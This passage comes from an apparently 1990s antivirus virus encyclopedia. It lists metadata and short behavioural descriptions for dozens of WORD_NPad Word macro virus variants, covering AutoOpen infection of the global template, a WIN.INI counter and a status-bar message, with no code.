  22201. Upon reaching a value of 23 it resets the counter and displays
  22202. the following message in the status bar:
  22203.  
  22204. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22205.  
  22206.  
  22207. [WORD_NPad.B]
  22208. Virus name: WORD_NPad.B
  22209. Virus Type: Word macro virus
  22210. Number of macros: 1
  22211. Encrypted: Yes
  22212. Macro names: AutoOpen
  22213. Size of macros: 1831 Bytes
  22214. Place of origin: Bandung, Indonesia
  22215. Date of origin: March 1996
  22216. Destructive: No
  22217. Seen In-The-Wild: No
  22218. Description:
  22219.  
  22220. The difference between this new variant and the original NPad
  22221. virus is that some bytes have been patched in the macro virus
  22222. code. The result of the change is an invalid instruction. NPad.B
  22223. is able to infect the global template and further documents,
  22224. yet upon reaching the invalid part of the macro code, it
  22225. displays a syntax error message.
  22226.  
  22227. The message from the original NPad virus is never displayed.
  22228.  
  22229.  
  22230. [WORD_NPad.C]
  22231. Virus name: WORD_NPad.C
  22232. Virus Type: Word macro virus
  22233. Number of macros: 1
  22234. Encrypted: Yes
  22235. Macro names: AutoOpen
  22236. Size of macros: 1831 Bytes
  22237. Place of origin: Unknown
  22238. Date of origin: January 1997
  22239. Destructive: No
  22240. Seen In-The-Wild: No
  22241. Description:
  22242.  
  22243. NPad.C is a minor variant based on the older NPad.A virus.
  22244. The only difference between the two viruses is that NPad.C is
  22245. a corrupted variant, with some bytes being patches from the NPad.A
  22246. virus.
  22247.  
  22248. As a result of the corruption, NPad.C only executes some of its
  22249. virus code. Infection of the global template and further
  22250. documents still works, yet NPad.C never displays the scrolling
  22251. message from the original NPad.A virus. Instead it displays a
  22252. WordBasic error message.
  22253.  
  22254.  
  22255. [WORD_NPad.D]
  22256. Virus name: WORD_NPad.D
  22257. Virus Type: Word macro virus
  22258. Number of macros: 1
  22259. Encrypted: Yes
  22260. Macro names: AutoOpen
  22261. Size of macros: 1831 Bytes
  22262. Place of origin: Indonesia
  22263. Date of origin: January 1997
  22264. Destructive: No
  22265. Seen In-The-Wild: No
  22266. Description:
  22267.  
  22268. NPad.D is a minor variant based on the older NPad.A virus.
  22269. The only difference between the two viruses is that NPad.D is
  22270. a corrupted variant, with some bytes being patches from the
  22271. NPad.A virus.
  22272.  
  22273. As a result of the corruption, NPad.D only executes some of
  22274. its virus code. Infection of the global template and further
  22275. documents still works, yet NPad.D never displays the scrolling
  22276. message from the original NPad.A virus. Instead it displays a
  22277. WordBasic error message.
  22278.  
  22279.  
  22280. [WORD_NPad.E]
  22281. Virus name: WORD_NPad.E
  22282. Virus Type: Word macro virus
  22283. Number of macros: 1
  22284. Encrypted: Yes
  22285. Macro names: AutoOpen
  22286. Size of macros: 1831 Bytes
  22287. Place of origin: Unknown
  22288. Date of origin: January 1997
  22289. Destructive: No
  22290. Seen In-The-Wild: No
  22291. Description:
  22292.  
  22293. NPad.E is a minor variant based on the older NPad.A virus.
  22294. The only difference between the two viruses is that NPad.E is
  22295. a corrupted variant, with some bytes being patches from the
  22296. NPad.A virus.
  22297.  
  22298. As a result of the corruption, NPad.E only executes some of its
  22299. virus code. Infection of the global template and further
  22300. documents still works, yet NPad.E never displays the scrolling
  22301. message from the original NPad.A virus. Instead it displays a
  22302. WordBasic error message.
  22303.  
  22304.  
  22305. [WORD_NPad.F]
  22306. Virus name: WORD_NPad.F
  22307. Virus Type: Word macro virus
  22308. Number of macros: 1
  22309. Encrypted: Yes
  22310. Macro names: AutoOpen
  22311. Size of macros: 1831 Bytes
  22312. Place of origin: Unknown
  22313. Date of origin: January 1997
  22314. Destructive: No
  22315. Seen In-The-Wild: No
  22316. Description:
  22317.  
  22318. NPad.F is a minor variant based on the older NPad.A virus.
  22319. The only difference between the two viruses is that NPad.F is
  22320. a corrupted variant, with some bytes being patches from the
  22321. NPad.A virus.
  22322.  
  22323. As a result of the corruption, NPad.F only executes some of its
  22324. virus code. Infection of the global template and further
  22325. documents still works, yet NPad.F never displays the scrolling
  22326. message from the original NPad.A virus. Instead it displays a
  22327. WordBasic error message.
  22328.  
  22329.  
  22330. [WORD_NPad.G]
  22331. Virus name: WORD_NPad.G
  22332. Virus Type: Word macro virus
  22333. Number of macros: 1
  22334. Encrypted: Yes
  22335. Macro names:  AutoOpen
  22336. Size of macros: 1831 Bytes
  22337. Place of origin: Unknown
  22338. Date of origin: January 1997
  22339. Destructive: No
  22340. Seen In-The-Wild: No
  22341. Description:
  22342.  
  22343. NPad.G is a minor variant based on the older NPad.A virus.
  22344. The only difference between the two viruses is that NPad.G is
  22345. a corrupted variant, with some bytes being patches from the
  22346. NPad.A virus.
  22347.  
  22348. As a result of the corruption, NPad.G only executes some of its
  22349. virus code. Infection of the global template and further documents
  22350. still works, yet NPad.G never displays the scrolling message from
  22351. the original NPad.A virus. Instead it displays a WordBasic error
  22352. message.
  22353.  
  22354.  
  22355. [WORD_NPad.I]
  22356. Virus name: WORD_NPad.I
  22357. Virus Type: Word macro virus
  22358. Number of macros: 1
  22359. Encrypted: Yes
  22360. Macro names: AutoOpen
  22361. Size of macros: 1831 Bytes
  22362. Place of origin: Unknown
  22363. Date of origin: January 1997
  22364. Destructive: No
  22365. Seen In-The-Wild: No
  22366. Description:
  22367.  
  22368. NPad.I is a minor variant based on the older NPad.A virus.
  22369. The only difference between the two viruses is that NPad.I is a
  22370. corrupted variant, with some bytes being patches from the
  22371. NPad.A virus.
  22372.  
  22373. As a result of the corruption, NPad.I only executes some of its
  22374. virus code. Infection of the global template and further documents
  22375. still works, yet NPad.I never displays the scrolling message from
  22376. the original NPad.A virus. Instead it displays a WordBasic error
  22377. message.
  22378.  
  22379.  
  22380.  
  22381. [WORD_NPad.M]
  22382. Virus name: WORD_NPad.M
  22383. Virus Type: Word macro virus
  22384. Number of macros: 1
  22385. Encrypted: Yes
  22386. Macro names: AutoOpen
  22387. Size of macros: 1831 Bytes
  22388. Place of origin: Unknown
  22389. Date of origin: 1997
  22390. Destructive: No
  22391. Seen In-The-Wild: No
  22392. Description:
  22393.  
  22394. NPad.I is a minor variant based on the older NPad.A virus.
  22395. The only difference between the two viruses is that NPad.I is a
  22396. corrupted variant, with some bytes being patches from the
  22397. NPad.A virus.
  22398.  
  22399. As a result of the corruption, NPad.I only executes some of its
  22400. virus code. Infection of the global template and further documents
  22401. still works, yet NPad.I never displays the scrolling message from
  22402. the original NPad.A virus. Instead it displays a WordBasic error
  22403. message.
  22404.  
  22405.  
  22406. [WORD_NPad.AB]
  22407. Virus name: WORD_NPad.AB
  22408. Virus Type: Word macro virus
  22409. Number of macros: 1
  22410. Encrypted: Yes
  22411. Macro names: AutoOpen
  22412. Size of macros: 1831 Bytes
  22413. Place of origin: Unknown
  22414. Date of origin: 1996
  22415. Destructive: No
  22416. Seen In-The-Wild: No
  22417. Description:
  22418.  
  22419. The only difference between this new variant and previous
  22420. NPad viruses is that NPad.AB has some minor code
  22421. modifications.
  22422.  
  22423. NPad.AB modifies the "compatibility" section inside the
  22424. WIN.INI file. It adds a counter under the name of "NPAD328"
  22425. and each time the virus is activated, it adds 1 to its value.
  22426. Upon reaching a value of 23 it resets the counter and displays
  22427. the following message in the status bar:
  22428.  
  22429. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22430.  
  22431. It infects the global template when an infected document is
  22432. opened. Further documents become infected when they are
  22433. also opened (AutoOpen).
  22434.  
  22435.  
  22436. [WORD_NPad.AD]
  22437. Virus name: WORD_NPad.AD
  22438. Virus Type: Word macro virus
  22439. Number of macros: 1
  22440. Encrypted: Yes
  22441. Macro names: AutoOpen
  22442. Size of macros: 1831 Bytes
  22443. Place of origin: Unknown
  22444. Date of origin: Spring 1997
  22445. Destructive: No
  22446. Seen In-The-Wild: No
  22447. Description:
  22448.  
  22449. The only difference between this new variant and previous
  22450. NPad viruses is that NPad.AD has some corrupted codes.
  22451.  
  22452. As a result of the corruption, NPad.AD only executes some of
  22453. its virus codes. Npad.AD infects the global template (normal.dot)
  22454. when an infected document in opened. Further documents
  22455. become infected when they are also opened.
  22456.  
  22457.  
  22458. [WORD_NPad.AE]
  22459. Virus name: WORD_NPad.AE
  22460. Virus Type: Word macro virus
  22461. Number of macros: 1
  22462. Encrypted: Yes
  22463. Macro names: AutoOpen
  22464. Size of macros: 1831 Bytes
  22465. Place of origin: Unknown
  22466. Date of origin: Spring 1997
  22467. Destructive: No
  22468. Seen In-The-Wild: No
  22469. Description:
  22470.  
  22471. The only difference between this new variant and previous
  22472. NPad viruses is that NPad.AE has some corrupted codes.
  22473.  
  22474. As a result of the corruption, NPad.AE only executes some of
  22475. its virus codes. Npad.AE infects the global template (normal.dot)
  22476. when an infected document in opened. Further documents
  22477. become infected when they are also opened.
  22478.  
  22479.  
  22480. [WORD_NPad.AF]
  22481. Virus name: WORD_NPad.AF
  22482. Virus Type: Word macro virus
  22483. Number of macros: 1
  22484. Encrypted: Yes
  22485. Macro names: AutoOpen
  22486. Size of macros: 1831 Bytes
  22487. Place of origin: Unknown
  22488. Date of origin: Spring 1997
  22489. Destructive: No
  22490. Seen In-The-Wild: No
  22491. Description:
  22492.  
  22493. The only difference between this new variant and previous
  22494. NPad viruses is that NPad.AF has some minor code
  22495. modifications and a corrupted counter.
  22496.  
  22497. Infection of the global template occurs when an infected
  22498. document is opened. Further documents become infected when
  22499. they are also opened (AutoOpen).
  22500.  
  22501.  
  22502. [WORD_NPad.AG]
  22503. Virus name: WORD_NPad.AG
  22504. Virus Type: Word macro virus
  22505. Number of macros: 1
  22506. Encrypted: Yes
  22507. Macro names: AutoOpen
  22508. Size of macros: 1831 Bytes
  22509. Place of origin: Unknown
  22510. Date of origin: Spring 1997
  22511. Destructive: No
  22512. Seen In-The-Wild: No
  22513. Description:
  22514.  
  22515. The only difference between this new variant and previous
  22516. NPad viruses is that NPad.AG has some corrupted codes.
  22517.  
  22518. As a result of the corruption, NPad.AG only executes some of
  22519. its virus codes. Npad.AG infects the global template (normal.dot)
  22520. when an infected document in opened. Further documents
  22521. become infected when they are also opened.
  22522.  
  22523.  
  22524. [WORD_NPad.AH]
  22525. Virus name: WORD_NPad.AH
  22526. Virus Type: Word macro virus
  22527. Number of macros: 1
  22528. Encrypted: Yes
  22529. Macro names: AutoOpen
  22530. Size of macros: 1831 Bytes
  22531. Place of origin: Unknown
  22532. Date of origin: Spring 1997
  22533. Destructive: No
  22534. Seen In-The-Wild: No
  22535. Description:
  22536.  
  22537. The only difference between this new variant and previous
  22538. NPad viruses is that NPad.AH has some corrupted codes.
  22539.  
  22540. As a result of the corruption, NPad.AH only executes some of
  22541. its virus codes. Npad.AH infects the global template (normal.dot)
  22542. when an infected document in opened. Further documents
  22543. become infected when they are also opened.
  22544.  
  22545.  
  22546. [WORD_NPad.AI]
  22547. Virus name: WORD_NPad.AI
  22548. Virus Type: Word macro virus
  22549. Number of macros: 1
  22550. Encrypted: Yes
  22551. Macro names: AutoOpen
  22552. Size of macros: 1831 Bytes
  22553. Place of origin: Unknown
  22554. Date of origin: Spring 1997
  22555. Destructive: No
  22556. Seen In-The-Wild: No
  22557. Description:
  22558.  
  22559. The only difference between this new variant and previous
  22560. NPad viruses is that NPad.AI has some corrupted codes.
  22561.  
  22562. As a result of the corruption, NPad.AI only executes some of its
  22563. virus codes. Npad.AI infects the global template (normal.dot)
  22564. when an infected document in opened. Further documents
  22565. become infected when they are also opened.
  22566.  
  22567.  
  22568. [WORD_NPad.AJ]
  22569. Virus name: WORD_NPad.AJ
  22570. Virus Type: Word macro virus
  22571. Number of macros: 1
  22572. Encrypted: Yes
  22573. Macro names: AutoOpen
  22574. Size of macros: 1831 Bytes
  22575. Place of origin: Unknown
  22576. Date of origin: Spring 1997
  22577. Destructive: No
  22578. Seen In-The-Wild: No
  22579. Description:
  22580.  
  22581. The only difference between this new variant and previous
  22582. NPad viruses is that NPad.AJ has some corrupted codes.
  22583.  
  22584. As a result of the corruption, NPad.AJ only executes some of its
  22585. virus codes. Npad.AJ infects the global template (normal.dot)
  22586. when an infected document in opened. Further documents
  22587. become infected when they are also opened.
  22588.  
  22589.  
  22590. [WORD_NPad.AK]
  22591. Virus name: WORD_NPad.AK
  22592. Virus Type: Word macro virus
  22593. Number of macros: 1
  22594. Encrypted: Yes
  22595. Macro names: AutoOpen
  22596. Size of macros: 1831 Bytes
  22597. Place of origin: Unknown
  22598. Date of origin: Spring 1997
  22599. Destructive: No
  22600. Seen In-The-Wild: No
  22601. Description:
  22602.  
  22603. The only difference between this new variant and previous
  22604. NPad viruses is that NPad.AK has some minor code
  22605. modifications.
  22606.  
  22607. NPad.AK modifies the "compatibility" section inside the
  22608. WIN.INI file. It adds a counter under the name of "NPAD328"
  22609. and each time the virus is activated, it adds 1 to its value.
  22610. Upon reaching a value of 23 it resets the counter and displays
  22611. the following message in the status bar:
  22612.  
  22613. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22614.  
  22615. It infects the global template when an infected document is
  22616. opened.  Further documents become infected when they are
  22617. also opened (AutoOpen).
  22618.  
  22619.  
  22620. [WORD_NPad.AM]
  22621. Virus name: WORD_NPad.AM
  22622. Virus Type: Word macro virus
  22623. Number of macros: 1
  22624. Encrypted: Yes
  22625. Macro names: AutoOpen
  22626. Size of macros: 1831 Bytes
  22627. Place of origin: Unknown
  22628. Date of origin: Spring 1997
  22629. Destructive: No
  22630. Seen In-The-Wild: No
  22631. Description:
  22632.  
  22633. The only difference between this new variant and previous
  22634. NPad viruses is that NPad.AM has some corrupted codes.
  22635.  
  22636. As a result of the corruption, NPad.AM only executes some of
  22637. its virus codes. Npad.AM infects the global template when an
  22638. infected document in opened. Further documents become infected
  22639. when they are also opened.
  22640.  
  22641.  
  22642. [WORD_NPad.AN]
  22643. Virus name: WORD_NPad.AN
  22644. Virus Type: Word macro virus
  22645. Number of macros: 1
  22646. Encrypted: Yes
  22647. Macro names: AutoOpen
  22648. Size of macros: 1831 Bytes
  22649. Place of origin: Switzerland
  22650. Date of origin: Spring 1997
  22651. Destructive: No
  22652. Seen In-The-Wild: No
  22653. Description:
  22654.  
  22655. The only difference between this new variant and previous
  22656. NPad viruses is that NPad.AN has some corrupted codes.
  22657.  
  22658. As a result of the corruption, NPad.AN only executes some of
  22659. its virus codes. Npad.AN infects the global template (normal.dot)
  22660. when an infected document in opened. Further documents
  22661. become infected when they are also opened.
  22662.  
  22663.  
  22664. [WORD_NPad.AO]
  22665. Virus name: WORD_NPad.AO
  22666. Virus Type: Word macro virus
  22667. Number of macros: 1
  22668. Encrypted: Yes
  22669. Macro names: AutoOpen
  22670. Size of macros: 1831 Bytes
  22671. Place of origin: Unknown
  22672. Date of origin: Spring 1997
  22673. Destructive: No
  22674. Seen In-The-Wild: No
  22675. Description:
  22676.  
  22677. The only difference between this new variant and previous
  22678. NPad viruses is that NPad.AO has some minor code
  22679. modifications.
  22680.  
  22681. NPad.AO modifies the "compatibility" section inside the
  22682. WIN.INI file. It adds a counter under the name of "NPAD328"
  22683. and each time the virus is activated, it adds 1 to its value.
  22684. Upon reaching a value of 23 it resets the counter and displays
  22685. the following message in the status bar:
  22686.  
  22687. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22688.  
  22689. It infects the global template when an infected document is
  22690. opened.  Further documents become infected when they are
  22691. also opened (AutoOpen).
  22692.  
  22693.  
  22694. [WORD_NPad.AP]
  22695. Virus name: WORD_NPad.AP
  22696. Virus Type: Word macro virus
  22697. Number of macros: 1
  22698. Encrypted: Yes
  22699. Macro names: AutoOpen
  22700. Size of macros: 1831 Bytes
  22701. Place of origin: Unknown
  22702. Date of origin: Spring 1997
  22703. Destructive: No
  22704. Seen In-The-Wild: No
  22705. Description:
  22706.  
  22707. The only difference between this new variant and previous
  22708. NPad viruses is that NPad.AP has some minor code
  22709. modifications and a corrupted payload.
  22710.  
  22711. As a result of the corruption, NPad.AP only executes some of
  22712. its virus codes. Infection of the global template occurs when
  22713. an infected document is opened. Further documents become
  22714. infected when they are also opened (AutoOpen).
  22715.  
  22716.  
  22717. [WORD_NPad.AQ]
  22718. Virus name: WORD_NPad.AQ
  22719. Virus Type: Word macro virus
  22720. Number of macros: 1
  22721. Encrypted: Yes
  22722. Macro names: AutoOpen
  22723. Size of macros: 1831 Bytes
  22724. Place of origin: Unknown
  22725. Date of origin: Spring 1997
  22726. Destructive: No
  22727. Seen In-The-Wild: No
  22728. Description:
  22729.  
  22730. The only difference between this new variant and previous
  22731. NPad viruses is that NPad.AQ has some minor code
  22732. modifications and a corrupted payload.
  22733.  
  22734. As a result of the corruption, NPad.AQ only executes some of
  22735. its virus codes. Infection of the global template occurs when an
  22736. infected document is opened. Further documents become
  22737. infected when they are also opened (AutoOpen).
  22738.  
  22739.  
  22740. [WORD_Npad.AS]
  22741. Virus name: WORD_NPad.AS
  22742. Virus Type: Word macro virus
  22743. Number of macros: 1
  22744. Encrypted: Yes
  22745. Macro names: AutoOpen
  22746. Size of macros: 1831 Bytes
  22747. Place of origin: Unknown
  22748. Date of origin: Spring 1997
  22749. Destructive: No
  22750. Seen In-The-Wild: No
  22751. Description:
  22752.  
  22753. The only difference between this new variant and previous
  22754. NPad viruses is that NPad.AS has some minor code
  22755. modifications and a corrupted payload.
  22756.  
  22757. As a result of the corruption, NPad.AS only executes some of its
  22758. virus codes. Infection of the global template occurs when an
  22759. infected document is opened. Further documents become  infected when
  22760. they are also opened (AutoOpen).
  22761.  
  22762.  
  22763. [WORD_NPad.AU]
  22764. Virus name: WORD_NPad.AU
  22765. Virus Type: Word macro virus
  22766. Number of macros: 1
  22767. Encrypted: Yes
  22768. Macro names: AutoOpen
  22769. Size of macros: 1831 Bytes
  22770. Place of origin: Australia
  22771. Date of origin: Spring 1997
  22772. Destructive: No
  22773. Seen In-The-Wild: No
  22774. Description:
  22775.  
  22776. The only difference between this new variant and previous
  22777. NPad viruses is that NPad.AU has some minor code
  22778. modifications and a corrupted payload.
  22779.  
  22780. As a result of the corruption, NPad.AU only executes some of
  22781. its virus codes. Infection of the global template occurs when an
  22782. infected document is opened. Further documents become
  22783. infected when they are also opened (AutoOpen).
  22784.  
  22785.  
  22786. [WORD_Npad.AV]
  22787. Virus name: WORD_NPad.AV
  22788. Virus Type: Word macro virus
  22789. Number of macros: 1
  22790. Encrypted: Yes
  22791. Macro names: AutoOpen
  22792. Size of macros: 1831 Bytes
  22793. Place of origin: Unknown
  22794. Date of origin: Spring 1997
  22795. Destructive: No
  22796. Seen In-The-Wild: No
  22797. Description:
  22798.  
  22799. The only difference between this new variant and previous
  22800. NPad viruses is that NPad.AV has some minor code
  22801. modifications and a corrupted payload.
  22802.  
  22803. As a result of the corruption, NPad.AV only executes some of
  22804. its virus codes. Infection of the global template occurs when an
  22805. infected document is opened. Further documents become
  22806. infected when they are also opened (AutoOpen).
  22807.  
  22808.  
  22809. [WORD_Npad.AW]
  22810. Virus name: WORD_NPad.AW
  22811. Virus Type: Word macro virus
  22812. Number of macros: 1
  22813. Encrypted: Yes
  22814. Macro names: AutoOpen
  22815. Size of macros: 1831 Bytes
  22816. Place of origin: Netherlands
  22817. Date of origin: Spring 1997
  22818. Destructive: No
  22819. Seen In-The-Wild: No
  22820. Description:
  22821.  
  22822. The only difference between this new variant and previous
  22823. NPad viruses is that NPad.AW has a one-byte code
  22824. modification.
  22825.  
  22826. NPad.AW modifies the "compatibility" section inside the
  22827. WIN.INI file. It adds a counter under the name of "NPAD328"
  22828. and each time the virus is activated, it adds 1 to its value. Upon
  22829. reaching a value of 23 it resets the counter and displays the
  22830. following message in the status bar:
  22831.  
  22832. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22833.  
  22834. It infects the global template when an infected document is
  22835. opened.  Further documents become infected when they are
  22836. also opened (AutoOpen).
  22837.  
  22838.  
  22839. [WORD_NPad.AX]
  22840. Virus name; WORD_NPad.AX
  22841. Virus Type: Word macro virus
  22842. Number of macros: 1
  22843. Encrypted: Yes
  22844. Macro names: AutoOpen
  22845. Size of macros: 1831 Bytes
  22846. Place of origin: Unknown
  22847. Date of origin: Spring 1997
  22848. Destructive: No
  22849. Seen In-The-Wild: No
  22850. Description:
  22851.  
  22852. The only difference between this new variant and previous
  22853. NPad viruses is that NPad.AX has some minor code
  22854. modifications and a corrupted payload.
  22855.  
  22856. As a result of the corruption, NPad.AX only executes some of
  22857. its virus codes. Infection of the global template occurs when an
  22858. infected document is opened. Further documents become
  22859. infected when they are also opened (AutoOpen).
  22860.  
  22861.  
  22862. [WORD_NPad.AY]
  22863. Virus Name: WORD_NPad.AY
  22864. Virus Type: Word macro virus
  22865. Number of macros: 1
  22866. Encrypted: Yes
  22867. Macro names: AutoOpen
  22868. Size of macros: 1831 Bytes
  22869. Place of origin: Unknown
  22870. Date of origin: Spring 1997
  22871. Destructive: No
  22872. Seen In-The-Wild: No
  22873. Description:
  22874.  
  22875. The only difference between this new variant and previous
  22876. NPad viruses is that NPad.AY has some minor code
  22877. modifications and a corrupted payload.
  22878.  
  22879. As a result of the corruption, NPad.AY only executes some of
  22880. its virus codes. Infection of the global template occurs when an
  22881. infected document is opened. Further documents become
  22882. infected when they are also opened (AutoOpen).
  22883.  
  22884.  
  22885. [WORD_NPad.AZ]
  22886. Virus name: WORD_NPad.AZ
  22887. Virus Type: Word macro virus
  22888. Number of macros: 1
  22889. Encrypted: Yes
  22890. Macro names: AutoOpen
  22891. Size of macros: 1831 Bytes
  22892. Place of origin: Unknown
  22893. Date of origin: Spring 1997
  22894. Destructive: No
  22895. Seen In-The-Wild: No
  22896. Description:
  22897.  
  22898. The only difference between this new variant and previous
  22899. NPad viruses is that NPad.AZ has some minor code
  22900. modifications and a corrupted payload.
  22901.  
  22902. As a result of the corruption, NPad.AZ only executes some of
  22903. its virus codes. Infection of the global template occurs when an
  22904. infected document is opened. Further documents become
  22905. infected when they are also opened (AutoOpen).
  22906.  
  22907.  
  22908. [WORD_NPad.BA]
  22909. Virus name: WORD_NPad.BA
  22910. Virus Type: Word macro virus
  22911. Number of macros: 1
  22912. Encrypted: Yes
  22913. Macro names: AutoOpen
  22914. Size of macros: 1831 Bytes
  22915. Place of origin: Unknown
  22916. Date of origin: Spring 1997
  22917. Destructive: No
  22918. Seen In-The-Wild: No
  22919. Description:
  22920.  
  22921. The only difference between this new variant and previous
  22922. NPad viruses is that NPad.BA has some minor code
  22923. modifications and a corrupted payload.
  22924.  
  22925. As a result of the corruption, NPad.BA only executes some of
  22926. its virus codes. Infection of the global template occurs when an
  22927. infected document is opened. Further documents become
  22928. infected when they are also opened (AutoOpen).
  22929.  
  22930.  
  22931. [WORD_NPad.BC]
  22932. Virus name: WORD_NPad.BC
  22933. Virus Type: Word macro virus
  22934. Number of macros: 1
  22935. Encrypted: Yes
  22936. Macro names: AutoOpen
  22937. Size of macros: 1831 Bytes
  22938. Place of origin: Australia
  22939. Date of origin: Spring 1997
  22940. Destructive: No
  22941. Seen In-The-Wild: No
  22942. Description:
  22943.  
  22944. The only difference between this new variant and previous
  22945. NPad viruses is that NPad.BC has some minor code
  22946. modifications and a corrupted payload.
  22947.  
  22948. As a result of the corruption, NPad.BC only executes some of
  22949. its virus codes. Infection of the global template occurs when an
  22950. infected document is opened. Further documents become
  22951. infected when they are also opened (AutoOpen).
  22952.  
  22953.  
  22954. [WORD_NPad.BD]
  22955. Virus name: WORD_NPad.BD
  22956. Virus Type: Word macro virus
  22957. Number of macros: 1
  22958. Encrypted: Yes
  22959. Macro names: AutoOpen
  22960. Size of macros: 1831 Bytes
  22961. Place of origin: Unknown
  22962. Date of origin: Spring 1997
  22963. Destructive: No
  22964. Seen In-The-Wild: No
  22965. Description:
  22966.  
  22967. The only difference between this new variant and previous
  22968. NPad viruses is that NPad.BD has some minor code
  22969. modifications and a corrupted payload.
  22970.  
  22971. As a result of the corruption, NPad.BD only executes some of
  22972. its virus codes. Infection of the global template occurs when an
  22973. infected document is opened. Further documents become
  22974. infected when they are also opened (AutoOpen).
  22975.  
  22976.  
  22977. [WORD_NPad.BE]
  22978. Virus name: WORD_NPad.BE
  22979. Virus Type: Word macro virus
  22980. Number of macros: 1
  22981. Encrypted: Yes
  22982. Macro names: AutoOpen
  22983. Size of macros: 1831 Bytes
  22984. Place of origin: Unknown
  22985. Date of origin: Spring 1997
  22986. Destructive: No
  22987. Seen In-The-Wild: No
  22988. Description:
  22989.  
  22990. The only difference between this new variant and previous
  22991. NPad viruses is that NPad.BE has some minor code
  22992. modifications and a corrupted payload.
  22993.  
  22994. As a result of the corruption, NPad.BE only executes some of
  22995. its virus codes. Infection of the global template occurs when an
  22996. infected document is opened. Further documents become
  22997. infected when they are also opened (AutoOpen).
  22998.  
  22999.  
  23000. [WORD_NPad.BF]
  23001. Virus name: WORD_NPad.BF
  23002. Virus Type: Word macro virus
  23003. Number of macros: 1
  23004. Encrypted: Yes
  23005. Macro names: AutoOpen
  23006. Size of macros: 1831 Bytes
  23007. Place of origin: Unknown
  23008. Date of origin: Spring 1997
  23009. Destructive: No
  23010. Seen In-The-Wild: No
  23011. Description:
  23012.  
  23013. The only difference between this new variant and previous
  23014. NPad viruses is that NPad.BF has some minor code
  23015. modifications and a corrupted payload.
  23016.  
  23017. As a result of the corruption, NPad.BF only executes some of
  23018. its virus codes. Infection of the global template occurs when an
  23019. infected document is opened. Further documents become
  23020. infected when they are also opened (AutoOpen).
  23021.  
  23022.  
  23023. [WORD_NPad.BG]
  23024. Virus name: WORD_NPad.BG
  23025. Virus Type: Word macro virus
  23026. Number of macros: 1
  23027. Encrypted: Yes
  23028. Macro names: AutoOpen
  23029. Size of macros: 1831 Bytes
  23030. Place of origin: Unknown
  23031. Date of origin: Spring 1997
  23032. Destructive: No
  23033. Seen In-The-Wild: No
  23034. Description:
  23035.  
  23036. The only difference between this new variant and previous
  23037. NPad viruses is that NPad.BG has some minor code
  23038. modifications and a corrupted payload.
  23039.  
  23040. As a result of the corruption, NPad.BG only executes some of
  23041. its virus codes. Infection of the global template occurs when an
  23042. infected document is opened. Further documents become
  23043. infected when they are also opened (AutoOpen).
  23044.  
  23045.  
  23046. [WORD_NPad.BI]
  23047. Virus name: WORD_NPad.BI
  23048. Virus Type: Word macro virus
  23049. Number of macros: 1
  23050. Encrypted: Yes
  23051. Macro names: AutoOpen
  23052. Size of macros: 1831 Bytes
  23053. Place of origin: Unknown
  23054. Date of origin: Spring 1997
  23055. Destructive: No
  23056. Seen In-The-Wild: No
  23057. Description:
  23058.  
  23059. The only difference between this new variant and previous
  23060. NPad viruses is that NPad.BI has some minor code
  23061. modifications and a corrupted payload.
  23062.  
  23063. As a result of the corruption, NPad.BI only executes some of its
  23064. virus codes. Infection of the global template occurs when an
  23065. infected document is opened. Further documents become
  23066. infected when they are also opened (AutoOpen).
  23067.  
  23068.  
  23069. [WORD_NPad.H]
  23070. Virus name: WORD_NPad.H
  23071. Virus Type: Word macro virus
  23072. Number of macros: 1
  23073. Encrypted: Yes
  23074. Macro names: AutoOpen
  23075. Size of macros: 1831 Bytes
  23076. Place of origin: Unknown
  23077. Date of origin: 1996
  23078. Destructive: No
  23079. Seen In-The-Wild: No
  23080. Description:
  23081.  
  23082. The only difference between this new variant and previous
  23083. NPad viruses is that NPad.H has some minor code
  23084. modifications and a corrupted payload.
  23085.  
  23086. As a result of the corruption, NPad.H only executes some of its
  23087. virus codes. Infection of the global template and further
  23088. documents still works, yet NPad.H never displays the scrolling
  23089. message from the original NPad.A virus.
  23090.  
  23091.  
  23092. [WORD_NPad.J]
  23093. Virus name: WORD_NPad.J
  23094. Virus Type: Word macro virus
  23095. Number of macros: 1
  23096. Encrypted: Yes
  23097. Macro names: AutoOpen
  23098. Size of macros: 1831 Bytes
  23099. Place of origin: Unknown
  23100. Date of origin: 1996
  23101. Destructive: No
  23102. Seen In-The-Wild: No
  23103. Description:
  23104.  
  23105. The only difference between this new variant and previous
  23106. NPad viruses is that NPad.J has some minor code
  23107. modifications and a corrupted payload.
  23108.  
  23109. As a result of the corruption, NPad.J only executes some of its
  23110. virus codes. Infection of the global template and further
  23111. documents still works, yet NPad.J never displays the scrolling
  23112. message from the original NPad.A virus.
  23113.  
  23114.  
  23115. [WORD_NPad.K]
  23116. Virus name: WORD_NPad.K
  23117. Virus Type: Word macro virus
  23118. Number of macros: 1
  23119. Encrypted: Yes
  23120. Macro names: AutoOpen
  23121. Size of macros: 1831 Bytes
  23122. Place of origin: Unknown
  23123. Date of origin: 1996
  23124. Destructive: No
  23125. Seen In-The-Wild: No
  23126. Description:
  23127.  
  23128. The only difference between this new variant and previous
  23129. NPad viruses is that NPad.K has some minor code
  23130. modifications and a corrupted payload.
  23131.  
  23132. As a result of the corruption, NPad.K only executes some of its
  23133. virus codes. Infection of the global template and further
  23134. documents still works, yet NPad.K never displays the scrolling
  23135. message from the original NPad.A virus.
  23136.  
  23137.  
  23138. [WORD_NPad.L]
  23139. Virus name: WORD_NPad.L
  23140. Virus Type: Word macro virus
  23141. Number of macros: 1
  23142. Encrypted: Yes
  23143. Macro names: AutoOpen
  23144. Size of macros: 1831 Bytes
  23145. Place of origin: Unknown
  23146. Date of origin: 1996
  23147. Destructive: No
  23148. Seen In-The-Wild: No
  23149. Description:
  23150.  
  23151. The only difference between this new variant and previous
  23152. NPad viruses is that NPad.L has some minor code
  23153. modifications and a corrupted payload.
  23154.  
  23155. As a result of the corruption, NPad.L only executes some of its
  23156. virus codes. Infection of the global template and further
  23157. documents still works, yet NPad.L never displays the scrolling
  23158. message from the original NPad.A virus.
  23159.  
  23160.  
  23161. [WORD_NPad.O]
  23162. Virus name: WORD_NPad.O
  23163. Virus Type: Word macro virus
  23164. Number of macros: 1
  23165. Encrypted: Yes
  23166. Macro names: AutoOpen
